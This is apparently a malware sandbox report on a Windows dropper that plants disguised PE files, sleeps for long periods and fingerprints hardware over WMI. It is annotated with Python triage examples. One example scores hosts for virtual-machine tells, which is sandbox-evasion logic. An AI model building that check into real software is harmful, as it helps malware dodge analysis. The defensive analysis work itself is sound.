Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\GOHxPPGn.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LvueRqhB.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\luhiabrd.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CKigYxxx.log Jump to dropped file
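Every dropped file above is a PE image written to the Desktop under a random eight-letter name with a .log extension, which the sandbox saw written but never executed. An extension-based triage would skip them, so the check a responder wants is by content: a PE starts with the `MZ` DOS header and the `e_lfanew` field at offset 0x3C points to the `PE\0\0` signature. The script below is an added example, not code from the report or from the sample; it builds a constructed folder of test files (the one PE hidden as `.log` reuses a file name from the list above, the others are invented), then lists every file whose bytes say PE but whose extension does not.

```python
"""Find PE images hiding behind non-executable extensions.

Added example, not part of the sandbox report. The test folder and its files
are constructed here; only the name owAZVXxy.log is taken from the report.
"""
import os
import struct
import tempfile

# Extensions under which a PE file is expected; any other extension on a PE
# is a disguise worth flagging.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi"}


def is_pe(path: str) -> bool:
    """True if the file has an 'MZ' DOS header whose e_lfanew points at 'PE\\0\\0'."""
    try:
        with open(path, "rb") as fh:
            dos = fh.read(0x40)                       # full IMAGE_DOS_HEADER
            if len(dos) < 0x40 or dos[:2] != b"MZ":
                return False
            (e_lfanew,) = struct.unpack_from("<I", dos, 0x3C)
            fh.seek(e_lfanew)
            return fh.read(4) == b"PE\x00\x00"
    except OSError:
        return False


def find_disguised_pe(directory: str) -> list[str]:
    """Paths of PE files in `directory` whose extension is not a PE extension."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        ext = os.path.splitext(name)[1].lower()
        if ext not in PE_EXTENSIONS and is_pe(path):
            hits.append(path)
    return hits


def minimal_pe_bytes() -> bytes:
    """Smallest byte string that satisfies is_pe(): DOS header + PE signature.

    Constructed test data only; it is not a loadable executable."""
    header = bytearray(b"MZ" + b"\x00" * 0x3E)        # 0x40-byte DOS header
    struct.pack_into("<I", header, 0x3C, 0x40)         # e_lfanew -> offset 0x40
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20


def demo() -> list[str]:
    """Write a constructed Desktop-like folder and return the disguised PE names."""
    workdir = tempfile.mkdtemp(prefix="dropped_")
    samples = {
        "owAZVXxy.log": minimal_pe_bytes(),                        # PE hidden as .log
        "notes.log": b"2024-04-17 10:00:00 service started\n",     # a real log file
        "tool.exe": minimal_pe_bytes(),                            # PE where expected
        "MZ_prefix.txt": b"MZ" + b"\x00" * 0x3E + b"not a PE",     # MZ but no PE sig
    }
    for name, data in samples.items():
        with open(os.path.join(workdir, name), "wb") as fh:
            fh.write(data)
    return [os.path.basename(p) for p in find_disguised_pe(workdir)]


if __name__ == "__main__":
    print(demo())  # ['owAZVXxy.log']
```

Run it against a real user profile by calling `find_disguised_pe` on the Desktop path instead of `demo()`. The `e_lfanew` follow-through matters: plenty of text files begin with "MZ" by coincidence, and the PE signature check is what keeps those out of the hit list.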
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep count: 1889 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276 Thread sleep count: 1979 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep count: 2448 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 Thread sleep count: 2065 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 Thread sleep count: 2652 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 94 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 7748 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -599871s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -599765s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -599655s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -598696s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8040 Thread sleep time: -43200000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -598586s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -598125s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -597500s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -596828s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -596344s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -595891s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -595406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -595109s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -594781s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -594516s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -594234s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -593859s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -593516s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -593172s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -592859s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -592437s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -592172s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -591781s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -591437s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -591109s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -590640s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -590422s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -590094s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -589562s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -589109s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -588719s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -588266s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -587750s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -587250s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -586672s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -586250s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -585922s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -585469s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -585062s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -584547s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -584171s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583969s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583772s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583564s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583231s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -583050s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582859s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582703s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582536s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582380s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -582094s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8040 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -580047s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -579762s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -579547s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -579344s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -579156s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578969s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578810s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578609s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578226s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -578085s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577937s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577734s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577566s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577219s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -577031s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -576797s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -576594s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -576404s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -576219s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575968s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575828s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575656s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575437s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575223s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -575094s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574984s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574866s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574731s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574622s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574514s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574406s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574297s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574187s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -574077s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573954s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573810s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573683s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573531s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573418s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573299s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573172s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -573062s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -572953s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -572841s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -572734s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep time: -30000s >= -30000s
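Reading these sleep lines, and the "Thread delayed: delay time" lines further down, needs two pieces of context. The sandbox prints a negative number because NtDelayExecution takes a negative interval for a relative wait, and although the lines say "s" the magnitudes are milliseconds: 600000 is 10 minutes, 3600000 is 1 hour and 43200000 is 12 hours, and the persisted copy under Program Files issues all three. The value 922337203685477 is Int64.MaxValue divided by 10000, i.e. the largest 100-ns tick count converted to milliseconds, which is how an effectively infinite wait shows up; the other very large values (1844674407370954, 14757395258967632, 16602069666338586) are exact multiples of it (2, 16 and 18 times). Those infinite waits sit on powershell.exe worker threads and are usually the runtime's own blocking waits rather than something the sample added, so the 10-minute, 1-hour and 12-hour sleeps of the persisted copy are the evasion signal worth rating. The parser below is an added example, not part of the report; it consumes lines in exactly the shape printed here (a few are copied from this report as sample input), classifies each wait and summarises per image. The 3-minute bar mirrors the report's own "Contains long sleeps (>= 3 min)" signature; everything else is this example's choice.

```python
"""Rate the sandbox's thread-sleep and thread-delay lines as evasion signals.

Added example, not part of the report. Sample lines are copied from this
report; the classification thresholds are this example's own choice.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Int64.MaxValue 100-ns ticks expressed in milliseconds: 922337203685477.
# That is the figure the report prints for an effectively infinite wait.
INT64_MAX_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 3 * 60 * 1000        # the report's own "long sleep" bar (3 min)

# "Source: <proc> TID: <n> Thread sleep time: -<ms>s >= -30000s"
SLEEP_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?)\s+TID:\s+(?P<tid>\d+)\s+Thread sleep time:\s+"
    r"-?(?P<ms>\d+)s\s+>=\s+-?\d+s"
)
# "Source: <proc> Thread delayed: delay time: <ms>"   (no TID on these lines)
DELAY_RE = re.compile(
    r"^Source:\s+(?P<proc>.+?)\s+Thread delayed:\s+delay time:\s+(?P<ms>\d+)"
)


@dataclass
class SleepEvent:
    process: str          # image name only, e.g. powershell.exe
    tid: Optional[int]    # None for "Thread delayed" lines
    delay_ms: int


def parse_sleep_lines(text: str) -> list[SleepEvent]:
    """Extract sleep/delay events from report text; other lines are ignored."""
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        m = SLEEP_RE.match(line) or DELAY_RE.match(line)
        if not m:
            continue
        gd = m.groupdict()
        proc = gd["proc"].rsplit("\\", 1)[-1]       # keep the image name only
        tid = int(gd["tid"]) if gd.get("tid") else None
        events.append(SleepEvent(proc, tid, int(gd["ms"])))
    return events


def classify(delay_ms: int) -> str:
    """'infinite xN' for multiples of Int64.MaxValue, 'long' past 3 min, else 'short'."""
    if delay_ms >= INT64_MAX_MS:
        return f"infinite x{delay_ms // INT64_MAX_MS}"
    if delay_ms >= LONG_SLEEP_MS:
        return "long"
    return "short"


def summarize(events: list[SleepEvent]) -> dict[str, dict]:
    """Per image: event count, longest finite wait (ms) and number of infinite waits."""
    out: dict[str, dict] = defaultdict(
        lambda: {"events": 0, "max_finite_ms": 0, "infinite": 0})
    for ev in events:
        s = out[ev.process]
        s["events"] += 1
        if ev.delay_ms >= INT64_MAX_MS:
            s["infinite"] += 1
        else:
            s["max_finite_ms"] = max(s["max_finite_ms"], ev.delay_ms)
    return dict(out)


# Lines copied from this report (one keeps the "Jump to behavior" link text an
# HTML export leaves behind, to show the parser tolerates it).
SAMPLE = r"""
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep count: 1889 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8040 Thread sleep time: -43200000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe TID: 8056 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Thread delayed: delay time: 3600000
"""

if __name__ == "__main__":
    for ev in parse_sleep_lines(SAMPLE):
        print(f"{ev.process:36} tid={ev.tid} {ev.delay_ms:>18} ms  {classify(ev.delay_ms)}")
    print(summarize(parse_sleep_lines(SAMPLE)))
```

On the sample input the persisted copy ends up with three events, a longest finite wait of 43200000 ms (12 h) and no infinite waits, while the two infinite entries both belong to the initial dropper and to powershell.exe. When triaging a full report, sort the summary by `max_finite_ms` rather than by `infinite` count: the finite multi-minute waits are the ones an analysis VM has to patch or fast-forward past.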
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9B8BEC5A GetSystemInfo, 0_2_00007FFD9B8BEC5A
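Taken together, the lines above are a host fingerprint: the persisted copy queries Win32_BaseBoard, Win32_BIOS, Win32_ComputerSystem and Win32_Processor over WMI, both binaries ask for the full size of the C: volume (FileFsFullSizeInformation), and the dropper calls GetSystemInfo, which among other things returns the processor count. Those are the usual inputs to "am I in a VM?" logic: hypervisor vendor strings in the SMBIOS fields, and a small disk, little RAM or a single core as sandbox sizing tells. (The PhysicalDrive0 open is attributed to svchost.exe, not to the sample.) The function below is an added example, not the sample's decompiled logic and not part of the report; it applies those checks to a dictionary shaped like the WMI results, with two constructed host records. The marker list and the sizing thresholds are this example's assumptions.

```python
"""Score a host fingerprint for virtual-machine tells.

Added example, not the sample's code and not part of the report. The marker
strings, thresholds and the two host records below are assumptions and
constructed data, not values recovered from the sample.
"""
from typing import Optional

# Vendor strings hypervisors leave in the SMBIOS fields that WMI surfaces.
VM_MARKERS = ("vmware", "virtualbox", "vbox", "innotek", "qemu", "bochs",
              "xen", "kvm", "parallels", "hyper-v", "virtual machine")
# Sandboxes are often provisioned small; these bars are assumptions.
MIN_CORES = 2
MIN_RAM_BYTES = 4 * 1024 ** 3
MIN_DISK_BYTES = 60 * 1024 ** 3

# WMI class / property pairs whose values carry vendor strings (the four
# classes the report shows the persisted copy querying).
STRING_FIELDS = (
    ("Win32_BaseBoard", ("Manufacturer", "Product")),
    ("Win32_BIOS", ("Manufacturer", "SerialNumber", "Version")),
    ("Win32_ComputerSystem", ("Manufacturer", "Model")),
    ("Win32_Processor", ("Name",)),
)


def _marker_in(value) -> Optional[str]:
    """First VM marker contained in `value` (case-insensitive), else None."""
    text = str(value or "").lower()
    return next((m for m in VM_MARKERS if m in text), None)


def vm_indicators(host: dict) -> list[str]:
    """One reason per VM tell found; an empty list means nothing matched."""
    reasons = []
    for cls, props in STRING_FIELDS:
        rec = host.get(cls, {})
        for prop in props:
            hit = _marker_in(rec.get(prop))
            if hit:
                reasons.append(f"{cls}.{prop} contains '{hit}'")
    cores = host.get("Win32_Processor", {}).get("NumberOfCores", 0)
    if cores < MIN_CORES:                      # also visible via GetSystemInfo
        reasons.append(f"only {cores} core(s)")
    ram = host.get("Win32_ComputerSystem", {}).get("TotalPhysicalMemory", 0)
    if ram < MIN_RAM_BYTES:
        reasons.append(f"only {ram // 1024 ** 2} MiB RAM")
    disk = host.get("VolumeFullSizeBytes", 0)  # FileFsFullSizeInformation on C:\
    if disk < MIN_DISK_BYTES:
        reasons.append(f"C: volume only {disk // 1024 ** 3} GiB")
    return reasons


def looks_virtual(host: dict, min_hits: int = 2) -> bool:
    """Require more than one tell so a single odd field does not decide."""
    return len(vm_indicators(host)) >= min_hits

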